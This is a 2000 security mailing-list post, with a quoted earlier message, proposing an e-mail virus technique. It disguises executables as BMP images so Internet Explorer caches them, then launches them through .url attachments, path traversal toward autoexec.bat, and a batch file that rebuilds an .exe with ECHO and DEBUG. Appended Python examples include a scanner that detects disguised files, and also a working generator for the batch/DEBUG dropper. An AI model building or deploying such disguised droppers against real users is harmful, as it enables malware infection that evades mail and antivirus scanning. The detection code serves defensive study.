Subject: UPDATE on possible new "e-mail virus" concept ?
From: Zoa_Chien (zoa_chien at iname.com)
Date: Fri May 19 2000 - 16:01:37 CDT
- Next message: Security Advisory: "CAU Technologies, Inc. Security Advisory 2000.05.19.001 : Default Syslog Installations"
- Previous message: Taneli Huuskonen: "Re: possible new "e-mail virus" concept ? + bypassing IE settings"
- In reply to: Zoa_Chien: "possible new "e-mail virus" concept ? + bypassing IE settings"
- Next in thread: Jim Paris: "Re: UPDATE on possible new "e-mail virus" concept ?"
- Reply: Zoa_Chien: "UPDATE on possible new "e-mail virus" concept ?"
- Reply: Jim Paris: "Re: UPDATE on possible new "e-mail virus" concept ?"
Update:

Tested OK so far:
-------------------------
- saving VALID .com and .batch files without the user being prompted in the
temp inet files dir with their original names.
- creating executable files with debug.

Not tested yet: (not possible ?)
-----------------------
- saving the files in a random directory using "../filename.exe"

New ideas.
------------------
- If changing directories is not possible, could it be possible to send
someone an e-mail with an image source: http://www.server.com/virus.com
(with that virus.com being a com file that starts with BM) and enclose a
.url file as an attachment that points to file:///c:/temp-inet-files/virus.com
(Using a link in the HTML code will not work as it will prompt you for
a download dir)
I noticed that .url files will work exactly like .lnk files if made properly.
That means that if you double click on them in win98, no warnings will be
given, and the file will execute (if it's on your local HD).
- the remote server with the virus on it could change its version very
frequently to avoid recognition by virus scanners, and no virus code will be
in the attachment itself.
- This way, it could be possible to bypass mail scanners; I don't think
they scan image files.
This could be different if the extension is .com, of course.
How do most AV scanners work? Do they check the attachments, or do
they monitor the creation of new files in general?
- I think the new Microsoft patch makes sure that .vbs files sent to you as
an attachment can't be run just by clicking on them, but what if those
files already exist on your HD and we only point to those files in our
attachment?
Will it disallow us to run those files too?
Remember that setting Outlook security settings for Internet Zone and
Restricted Sites Zone will be bypassed too because the files are already
located on your very own hard disk the moment you preview the e-mail message.
- How about using .lnk / .chm files?
- btw, for those that are interested:
renaming a .exe file to any of the following extensions will still be
executed in NT if double-clicked upon:
.scr
.bat
.pif
.lnk
.com
.exe
.cmd
These file types can be used to point to other files:
.url
.lnk
.pif
Do you know of any others?
Zoa_Chien.
>Alternative approach for writing e-mail viruses ??
>--------------------------------------------------------------------
>
>Disclaimer:
>-----------
>
>None of this got tested, and chances are big that not everything will function.
>Everything I wrote is purely hypothetical, but I guess some ideas might be
>useful to know.
>(Please e-mail me if you did some testing on this, I don't have the time to
>test this myself.... (exams))
>
>Background: (Skip this if you don't have the time)
>-----------------
>
>While looking for a way to bypass the Internet Explorer (I.E.) security
>setting that disables all downloads a while ago, I noticed that I.E.
>automatically downloads image files (unless you have images disabled)
>and stores them in the "temporary internet files" folder.
>
>I did some testing on how I.E. (IE5, win98) handles those image files and found
>that it downloads the first few bytes, checks for a valid image file header
>and, if the header is present, it will download the rest of the file.
>And when the complete file is downloaded it will try to show the image.
>
>So, I took an executable file and changed the first 2 bytes
>(MZ) to BM with a hex editor (or edit.com /b), and then inserted this filename
>(renamed to file.bmp) as image source in an HTML page.
>
>When opening this page in I.E., the complete file got downloaded (I.E. assumed
>this was a .BMP file); however, it showed a red cross in I.E. like the ones
>you get with image not found.
>If I changed the BM back to MZ and renamed it back to file.exe I was able to
>run this program; I even did a binary file compare and it was exactly the
>same as the original one (so no stripping occurred).
>
>(I noticed that in NT4 things are different, since the temporary internet
>files located in /winnt/profiles/admin/Local settings/ is a special directory
>type; could someone give me more info on this type of dir?)
>I guess similar things will occur in other web browsers.
>
>--
>
>Virus concept: (not tested)
>--------------
>
>Meanwhile, I noticed that the image files for I.E. don't need to have a valid
>image file extension; anything will work fine. (And IE uses temporary files
>with the same name as the original files.)
>
>So, why not send someone a virus.bat file as image in an HTML mail. The first
>2 bytes in the .bat file should be BM (or any other image file header).
>We all know that when an error occurs in a .bat file all it will do is say
>"bad command or file name" and continue with the next line, so writing this
>BM in the beginning won't hurt.
>
>Hmmm.. let's see: what can I do with .bat files... pretty much, but I prefer
>.exe files.
>Not a problem: with debug.exe I can dump executable files as hex in an
>ASCII file, and back to .exe.
>So, in the .bat file I will use some ECHO commands >> filehex.txt to create
>the hex file.
>The next line in the .bat file should contain the command line parameters for
>debug to create this .exe file.
>And the last line should execute this .exe file.
>
>Example of how the .bat file should look:
>
>-BOF-
>BMdfjlqskdfjlksjdflksqjdflksjcvlvksjd (this will cause error, but who cares)
>ECHO 22 EF SD E3 FE AD >> filehex.txt (should append not overwrite)
>ECHO 1D A6 E6 .... >> filehex.txt
>...
>debug -xxxxx filehex.txt file.exe (I don't remember the correct parameters)
>file.exe
>-EOF-
>
>Of course, we would like this batch file to get executed automatically.
>
>This was not tested, but I think it might be possible to make a custom
>HTTP server that thinks "/../../../../../../file.bat" (or maybe "c:\file.bat")
>is valid, and when asked to send this file, it will not try to look in lower
>dirs to find the file, but simply will upload the file to the client.
>
>(I could use some %codes in the filename in the .html to scramble the dir and
>fool I.E.)
>That way, we might be able to save the temporary files in other dirs than
>"the temporary internet files" folder.
>
>If we are able to save the file as c:\autoexec.bat we could let the file
>execute on the next bootup.
>
>Enjoy!
>
>final note: maybe it is possible to create valid .com files with a valid
>image file header.
>(From good ol' times, I remember it was possible to give a .com file a "PK"
>as first 2 bytes of the file, thus avoiding getting scanned; just check
>the ASM meaning of the image file headers.)
>
>
>
>Zoa_Chien (zoa_chien at iname.com)
>
>-
>Vanheuverzwijn Joachim
>www.securax.org
>-
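The quoted "Background" section describes I.E. accepting a file as an image on the strength of its first bytes alone, and the "final note" asks what those image-header bytes mean as machine code. The following is an added example, not code from the original post or from Zoa_Chien: a Python check that a mail or cache scanner could apply to files the first-bytes sniffer would accept as BMP, plus a decoder for the magic bytes as 16-bit x86 instructions. The sniffing function is an assumed simplification of the behaviour the post describes, the three sample files are constructed inline, and the BMP layout used is the standard BITMAPFILEHEADER/BITMAPINFOHEADER.

```python
"""Added example (not from the original post): tell a real BMP apart from a
file that merely starts with the 'BM' magic, the way the post describes the
I.E. first-bytes check being fooled by an .exe whose 'MZ' was edited to 'BM'.
All sample files below are constructed for the example."""
import struct

# BITMAPFILEHEADER: magic, file size, two reserved words, offset of pixel data
BMP_FILE_HEADER = struct.Struct("<2sIHHI")
VALID_DIB_SIZES = {12, 40, 52, 56, 108, 124}

# Single-byte 16-bit x86 instructions for the ASCII bytes found in common magics.
# A .com file is raw code loaded at CS:0100, so a magic such as 'BM' in front
# of it executes as these instructions before the real program starts. The
# 'PK' case pushes a word the program never pops, which only matters if it
# exits with RET instead of INT 21h/4Ch.
OPCODES_16 = {0x42: "INC DX", 0x4D: "DEC BP", 0x5A: "POP DX",
              0x50: "PUSH AX", 0x4B: "DEC BX"}


def sniff_like_ie(data):
    """Assumed simplification of what the post describes: only the first few
    bytes decide whether the file is treated as an image."""
    if data[:2] == b"BM":
        return "bmp"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data[:2] == b"\xff\xd8":
        return "jpeg"
    return None


def bmp_is_structurally_valid(data):
    """Check the header fields a viewer needs, not just the magic."""
    if len(data) < BMP_FILE_HEADER.size + 4:
        return False
    magic, size, res1, res2, offset = BMP_FILE_HEADER.unpack_from(data)
    if magic != b"BM" or size != len(data) or res1 or res2:
        return False
    dib_size = struct.unpack_from("<I", data, BMP_FILE_HEADER.size)[0]
    if dib_size not in VALID_DIB_SIZES:
        return False
    return BMP_FILE_HEADER.size + dib_size <= offset <= len(data)


def looks_like_pe(data):
    """An MZ/PE file with only 'MZ' overwritten keeps e_lfanew (offset 0x3C)
    and the PE signature it points at, so it is still recognisable."""
    if len(data) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify(data):
    """Verdict a scanner should reach for a file the sniffer would pass."""
    sniffed = sniff_like_ie(data)
    if sniffed is None:
        return "not-an-image"
    if looks_like_pe(data):
        return "pe-behind-image-magic"
    if sniffed == "bmp" and not bmp_is_structurally_valid(data):
        return "bmp-magic-only"
    return sniffed


def magic_as_x86_16(magic):
    """Decode a magic as the 16-bit instructions a .com loader would execute."""
    return [OPCODES_16.get(b, "?") for b in magic]


# --- constructed samples ---------------------------------------------------
def make_tiny_bmp():
    """A valid 1x1 24-bit BMP (one red pixel plus row padding)."""
    pixels = b"\x00\x00\xff\x00"
    dib = struct.pack("<IiiHHIIiiII", 40, 1, 1, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    header = BMP_FILE_HEADER.pack(b"BM", 14 + len(dib) + len(pixels), 0, 0, 14 + len(dib))
    return header + dib + pixels


def make_disguised_pe():
    """A skeleton MZ/PE file with 'MZ' overwritten by 'BM', as in the post."""
    dos_stub = bytearray(0x40)
    dos_stub[0:2] = b"MZ"
    struct.pack_into("<I", dos_stub, 0x3C, 0x40)        # e_lfanew -> PE header
    pe_header = b"PE\0\0" + b"\x4c\x01" + bytes(18)     # COFF header, Machine = i386
    return b"BM" + bytes(dos_stub[2:]) + pe_header


def make_disguised_bat():
    """The post's .bat idea: a junk first line starting with 'BM', then commands."""
    return b"BMdfjlqskdfjlksjdflksqjdflksjcvlvksjd\r\nECHO 22 EF >> filehex.txt\r\n"


if __name__ == "__main__":
    for label, sample in [("real bmp", make_tiny_bmp()),
                          ("exe with BM", make_disguised_pe()),
                          ("bat with BM", make_disguised_bat())]:
        print(f"{label:12s} sniffed={sniff_like_ie(sample)!s:5s} verdict={classify(sample)}")
    print("'BM' as 16-bit code:", magic_as_x86_16(b"BM"))
```

The point of `classify` is that the sniffer and the validator disagree exactly for the files the post is interested in: the renamed .exe keeps its PE header behind the fake magic, and the .bat has a "BM" that no BMP header follows. The opcode table confirms the final note: "BM" decodes to INC DX / DEC BP and "MZ" to DEC BP / POP DX, neither of which breaks a .com program that sets up its own registers.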
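The quoted "Virus concept" section sketches a batch file that rebuilds an executable with ECHO lines and DEBUG, with the DEBUG parameters left unspecified. The following is an added example, not the author's code: a Python generator for the script form MS-DOS DEBUG actually reads from standard input (e, n, rbx/rcx, w, q), the batch file that writes that script with ECHO, and a small simulator of those DEBUG commands so the round trip can be checked offline. The 17-byte .com payload (which also illustrates the final note, since it begins with the "BM" magic), the file names filehex.txt and file.com, and the junk first line are all constructed for the example. One caveat the post does not mention: DEBUG refuses to write files named .exe or .hex, so the output has to be named .com or .bin and renamed afterwards.

```python
"""Added example (not the author's code): the DEBUG-script form of the batch
dropper sketched in the post, plus a simulator of the DEBUG commands it uses
so the round trip can be checked offline. Payload and file names are
constructed for the example."""

# Constructed payload: a 17-byte .com program that begins with the 'BM' image
# magic (INC DX / DEC BP, harmless here) and then prints "Hi!" via INT 21h/09h
# and exits via INT 21h/4Ch. The string sits at CS:010D because of the 2-byte prefix.
BM_COM = (b"BM"
          b"\xB4\x09"          # mov ah, 09h
          b"\xBA\x0D\x01"      # mov dx, 010Dh
          b"\xCD\x21"          # int 21h
          b"\xB4\x4C"          # mov ah, 4Ch
          b"\xCD\x21"          # int 21h
          b"Hi!$")


def make_debug_script(payload, out_name="file.com", chunk=16):
    """Build the script DEBUG reads from stdin: E(nter) the bytes at 0100h,
    N(ame) the output, set BX:CX to the length, W(rite), Q(uit).
    DEBUG refuses to write .EXE/.HEX names, so use .com or .bin and rename."""
    lines = []
    for off in range(0, len(payload), chunk):
        hexbytes = " ".join(f"{b:02X}" for b in payload[off:off + chunk])
        lines.append(f"e {0x100 + off:04X} {hexbytes}")
    lines += [f"n {out_name}",
              "rbx", f"{len(payload) >> 16:X}",      # high word of the length
              "rcx", f"{len(payload) & 0xFFFF:X}",   # low word of the length
              "w", "q"]
    return "\r\n".join(lines) + "\r\n"


def make_dropper_bat(payload, out_name="file.com", script_name="filehex.txt"):
    """The .bat layout from the post: a junk first line starting with 'BM'
    (fails with 'Bad command or file name' and the batch continues), ECHO lines
    that append the DEBUG script, then DEBUG rebuilds the binary and it is run.
    The space before '>>' matters: 'echo 11>> f' would be parsed as handle 1."""
    bat = ["BM_junk_first_line",
           f"@if exist {script_name} del {script_name}"]   # ECHO >> appends, so start clean
    for line in make_debug_script(payload, out_name).splitlines():
        bat.append(f"echo {line} >> {script_name}")
    bat += [f"debug < {script_name}", out_name]
    return "\r\n".join(bat) + "\r\n"


def script_from_bat(bat, script_name="filehex.txt"):
    """Recover the DEBUG script the ECHO lines would write (what a scanner can
    do to see the payload without running the batch)."""
    suffix = f" >> {script_name}"
    body = [line[len("echo "):-len(suffix)]
            for line in bat.splitlines()
            if line.startswith("echo ") and line.endswith(suffix)]
    return "\r\n".join(body) + "\r\n"


def run_debug_script(script):
    """Simulate the subset of DEBUG used above (e, n, rbx, rcx, w, q) on one
    64 KiB segment and return {name: bytes} for every W command."""
    mem = bytearray(0x10000)
    regs = {"bx": 0, "cx": 0}
    name, files = None, {}
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        cmd = cmd.lower()
        if cmd == "e":                       # e addr b1 b2 ... (hex)
            addr, *hexs = rest.split()
            base = int(addr, 16)
            for k, h in enumerate(hexs):
                mem[base + k] = int(h, 16)
        elif cmd in ("rbx", "rcx"):          # register prompt: value on next line
            regs[cmd[1:]] = int(lines[i].strip() or "0", 16)
            i += 1
        elif cmd == "n":
            name = rest.strip()
        elif cmd == "w":                     # write BX:CX bytes from offset 0100h
            length = (regs["bx"] << 16) | regs["cx"]
            files[name] = bytes(mem[0x100:0x100 + length])
        elif cmd == "q":
            break
        else:
            raise ValueError(f"unsupported DEBUG command in example: {line!r}")
    return files


if __name__ == "__main__":
    bat = make_dropper_bat(BM_COM)
    print(bat)
    rebuilt = run_debug_script(script_from_bat(bat))
    print("round trip ok:", rebuilt["file.com"] == BM_COM)
```

`script_from_bat` is the part a defender wants: the ECHO lines are plain text, so the binary the batch would assemble can be extracted and scanned without executing anything, which answers the post's question about whether scanners look at the attachment or only at files being created.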